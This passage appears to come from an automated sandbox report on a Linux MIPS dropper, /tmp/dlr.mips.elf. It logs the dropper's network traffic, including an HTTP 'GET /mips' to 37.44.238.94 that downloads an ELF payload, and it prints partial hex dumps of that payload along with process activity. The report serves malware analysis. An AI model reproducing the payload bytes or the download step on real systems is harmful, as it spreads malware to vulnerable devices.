                                                Dec 21, 2024 06:12:04.306544065 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.307720900 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.311232090 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.311367989 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.312675953 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.316066027 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.316190004 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.317559958 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.388578892 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.388624907 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.389621019 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.403107882 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.403163910 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.403976917 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.406914949 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.407016993 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.407190084 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.409297943 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.451229095 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.451292038 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.451294899 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.453257084 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.453349113 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.453679085 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.457648993 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.459398985 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.459438086 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.459964991 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.463785887 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.463938951 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.464524031 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.468465090 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.468575954 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.469019890 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.472568989 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.472750902 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.473531961 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.476942062 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.477039099 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.478041887 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.548643112 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.584542036 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.584604025 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.585756063 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.668678045 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.668780088 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.669456005 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.670382977 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.670494080 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.671111107 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.674482107 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.674573898 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.676091909 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:04.678066969 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:04.719600916 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:05.127561092 CET42836443192.168.2.2391.189.91.43
                                                Dec 21, 2024 06:12:05.653552055 CET4268480192.168.2.2337.44.238.94
                                                Dec 21, 2024 06:12:05.773144007 CET804268437.44.238.94192.168.2.23
                                                Dec 21, 2024 06:12:05.895517111 CET4251680192.168.2.23109.202.202.202
                                                Dec 21, 2024 06:12:19.717820883 CET43928443192.168.2.2391.189.91.42
                                                Dec 21, 2024 06:12:32.004007101 CET42836443192.168.2.2391.189.91.43
                                                Dec 21, 2024 06:12:36.099347115 CET4251680192.168.2.23109.202.202.202
                                                Dec 21, 2024 06:13:00.672190905 CET43928443192.168.2.2391.189.91.42
                                                Session IDSource IPSource PortDestination IPDestination Port
                                                0192.168.2.234268437.44.238.9480
                                                TimestampBytes transferredDirectionData
                                                Dec 21, 2024 06:12:02.606755972 CET46OUTGET /mips HTTP/1.0
                                                Data Raw: 00 00 52 41 59 0a 00 00 00 00 00 00
                                                Data Ascii: RAY
                                                Dec 21, 2024 06:12:03.875627041 CET712INHTTP/1.0 200 OK
                                                Accept-Ranges: bytes
                                                Content-Length: 105780
                                                Content-Type: application/octet-stream
                                                Last-Modified: Sat, 21 Dec 2024 03:10:52 GMT
                                                Date: Sat, 21 Dec 2024 05:12:03 GMT
                                                Data Raw: 7f 45 4c 46 01 02 01 00 00 00 00 00 00 00 00 00 00 02 00 08 00 00 00 01 00 40 02 60 00 00 00 34 00 01 9b 04 00 00 10 07 00 34 00 20 00 03 00 28 00 0e 00 0d 00 00 00 01 00 00 00 00 00 40 00 00 00 40 00 00 00 01 88 70 00 01 88 70 00 00 00 05 00 01 00 00 00 00 00 01 00 01 90 00 00 45 90 00 00 45 90 00 00 00 0a a0 00 00 5c 48 00 00 00 06 00 01 00 00 64 74 e5 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 3c 1c 00 06 27 9c 14 1c 03 99 e0 21 27 bd ff e0 af bc 00 10 af bf 00 1c af bc 00 18 04 11 00 01 00 00 00 00 3c 1c 00 06 27 9c 13 f8 03 9f e0 21 8f 99 80 20 00 00 00 00 27 39 01 dc 03 20 f8 09 00 00 00 00 8f bc 00 10 00 00 00 00 04 11 00 01 00 00 00 00 3c 1c 00 06 27 9c 13 c8 03 9f e0 21 8f 99 80 24 00 00 00 00 27 39 66 60 03 20 f8 09 00 00 00 00 8f bc 00 10 00 00 00 00 8f bf 00 1c 00 00 00 00 03 e0 00 08 27 bd 00 20 3c 1c 00 06 27 9c 13 90 03 99 e0 21 27 bd ff d8 af bf 00 20 af b1 00 1c af b0 00 18 af bc 00 10 8f 91 80 18 00 00 00 00 92 22 9a d0 00 00 00 00 14 40 [TRUNCATED]
                                                Data Ascii: ELF@`44 (@@ppEE\HdtQ<'!'<'! '9 <'!$'9f` ' <'!' "@Y $B Y $B@$ $p$" '(<'!'
                                                Dec 21, 2024 06:12:03.875766039 CET1236INData Raw: 8f 99 81 b4 24 84 88 70 10 40 00 05 24 a5 9a d4 03 20 f8 09 00 00 00 00 8f bc 00 10 00 00 00 00 8f 84 80 18 8f 99 81 c0 8c 82 90 10 00 00 00 00 10 40 00 06 24 84 90 10 13 20 00 04 00 00 00 00 8f bf 00 18 03 20 00 08 27 bd 00 20 8f bf 00 18 00 00
                                                Data Ascii: $p@$ @$ ' ' !<'D!!0'$$'X <'!'0,($
                                                Dec 21, 2024 06:12:03.875803947 CET1236INData Raw: 8f b5 00 44 8f b4 00 40 8f b3 00 3c 8f b2 00 38 8f b1 00 34 8f b0 00 30 03 20 00 08 27 bd 00 58 82 42 00 00 00 00 00 00 14 40 00 14 30 56 00 ff af a0 00 24 8f 99 82 3c 00 00 00 00 03 20 f8 09 00 00 00 00 8f bc 00 18 ac 40 00 00 8f a2 00 28 8f 99
                                                Data Ascii: D@<840 'XB@0V$< @($ 0D 0!d ! $$&@&B$`P&p+@$$&R!b"p
                                                Dec 21, 2024 06:12:03.875843048 CET1236INData Raw: af b3 00 44 af b2 00 40 af b1 00 3c af b0 00 38 af bc 00 18 8f 99 84 64 30 92 00 ff af a5 00 64 02 40 20 21 24 05 00 04 00 e0 80 21 03 20 f8 09 30 d1 00 ff 8f bc 00 18 02 20 20 21 8f 99 82 b4 02 00 28 21 24 06 00 07 34 07 ff ff 03 20 f8 09 00 40
                                                Data Ascii: D@<8d0d@ !$! 0 !(!$4 @!0B !(!$4 00T4nd@ ! $@n@!`!@6@!d' !$4&s&U.&1$$ 0!
                                                Dec 21, 2024 06:12:03.875880957 CET1236INData Raw: 8c 44 00 00 02 20 28 21 02 00 30 21 24 07 40 00 03 20 f8 09 26 73 00 01 8f bc 00 10 16 74 ff e9 26 52 00 04 1a 80 ff e3 00 00 00 00 10 00 ff e4 00 00 98 21 03 20 f8 09 00 00 00 00 8f bc 00 10 10 00 ff b1 a6 22 00 02 8f bf 00 54 8f be 00 50 8f b7
                                                Data Ascii: D (!0!$@ &st&R! "TPLHD@<840'X 0W<'!'\XTPLHD@<8d0d@ !$! 0
                                                Dec 21, 2024 06:12:03.875920057 CET1236INData Raw: 24 07 02 00 03 20 f8 09 30 5e ff ff 8f bc 00 10 02 00 28 21 8f 99 82 b4 02 20 20 21 24 06 00 01 24 07 00 01 03 20 f8 09 30 53 ff ff 8f bc 00 10 02 40 20 21 8f 99 84 64 00 00 00 00 03 20 f8 09 24 05 00 04 00 40 a0 21 00 40 b8 21 34 02 ff ff 8f bc
                                                Data Ascii: $ 0^(! !$$ 0S@ !d $@!@!4\!@T&b|D''(@<808<$B$, 8 `(!8&1&C6&$0! $
                                                Dec 21, 2024 06:12:03.875957966 CET1236INData Raw: 00 06 35 00 32 69 00 01 00 04 25 40 af a5 01 8c af a6 01 90 00 07 3c c0 00 08 44 80 00 09 4c 40 27 a5 00 38 27 a6 00 48 27 a2 00 24 24 63 00 28 8f b7 01 cc 8f b2 01 4c 8f b5 01 48 af a4 01 74 af a7 01 94 af a8 01 98 af a9 01 9c 00 00 f0 21 af a5
                                                Data Ascii: 52i%@<DL@'8'H'$$c(LHt!x|$$ 0!$EX@!$0! @ !` !4F $$,c `.(4,!$* `
                                                Dec 21, 2024 06:12:03.875997066 CET1236INData Raw: 03 20 f8 09 26 24 00 28 8f bc 00 18 02 20 20 21 8f 99 82 fc 00 00 00 00 03 20 f8 09 24 05 00 14 8e 43 00 04 8f bc 00 18 ae 03 00 04 8e 44 00 08 8f 99 82 20 24 63 00 01 ae 43 00 04 02 00 28 21 ae 04 00 08 02 e0 30 21 02 20 20 21 03 c0 38 21 03 20
                                                Data Ascii: &$( ! $CD $cC(!0! !8! "$cl (!$@ &&&R&s$$ b!hQ$Qd
                                                Dec 21, 2024 06:12:03.876034021 CET1236INData Raw: 24 04 00 02 24 05 00 03 03 20 f8 09 24 06 00 06 24 10 ff ff 8f bc 00 18 10 50 00 91 00 40 b0 21 8f 99 84 00 24 02 00 01 24 03 00 04 af a2 00 20 af a3 00 10 02 c0 20 21 00 00 28 21 24 06 00 03 03 20 f8 09 27 a7 00 20 8f bc 00 18 10 50 00 7f 00 12
                                                Data Ascii: $$ $$P@!$$ !(!$ ' P22s2<8,4 4 '0b$E$C4$B0c0^00!("<8B C$P*S`m d$ $
                                                Dec 21, 2024 06:12:03.876071930 CET1236INData Raw: 03 20 f8 09 00 00 00 00 8f a3 00 38 8f bc 00 18 14 70 ff 93 a6 22 00 2c 8f 99 83 80 00 00 00 00 03 20 f8 09 00 00 00 00 8f a4 00 2c 8f bc 00 18 14 80 ff 8f a6 62 00 02 8f 99 83 80 00 00 00 00 03 20 f8 09 00 00 00 00 8f bc 00 18 ae 42 00 10 8f a2
                                                Data Ascii: 8p", ,b B0@4 &d4$WS$^4T <'!'800000000000!$(! 4
                                                Dec 21, 2024 06:12:03.996180058 CET1236INData Raw: 34 07 ff ff 03 20 f8 09 af a2 00 4c 8f bc 00 18 30 42 ff ff 8f 99 82 b4 02 20 20 21 02 00 28 21 24 06 00 04 24 07 00 40 03 20 f8 09 af a2 00 48 8f bc 00 18 02 20 20 21 8f 99 82 b4 02 00 28 21 24 06 00 05 00 00 38 21 03 20 f8 09 30 5e 00 ff 8f bc
                                                Data Ascii: 4 L0B !(!$$@ H !(!$8! 0^ !(!$4 0B !(!$4 D0B$4 !(! @ !(!$4 X$ !(!0!


                                                System Behavior

                                                Start time (UTC):05:11:54
                                                Start date (UTC):21/12/2024
                                                Path:/usr/bin/dash
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Start time (UTC):05:11:54
                                                Start date (UTC):21/12/2024
                                                Path:/usr/bin/rm
                                                Arguments:rm -f /tmp/tmp.EBrSfcrRYz /tmp/tmp.lNgNKUxc5s /tmp/tmp.xevoaEOA6J
                                                File size:72056 bytes
                                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                Start time (UTC):05:11:54
                                                Start date (UTC):21/12/2024
                                                Path:/usr/bin/dash
                                                Arguments:-
                                                File size:129816 bytes
                                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                Start time (UTC):05:11:54
                                                Start date (UTC):21/12/2024
                                                Path:/usr/bin/rm
                                                Arguments:rm -f /tmp/tmp.EBrSfcrRYz /tmp/tmp.lNgNKUxc5s /tmp/tmp.xevoaEOA6J
                                                File size:72056 bytes
                                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                Start time (UTC):05:12:01
                                                Start date (UTC):21/12/2024
                                                Path:/tmp/dlr.mips.elf
                                                Arguments:/tmp/dlr.mips.elf
                                                File size:5777432 bytes
                                                MD5 hash:0083f1f0e77be34ad27f849842bbb00c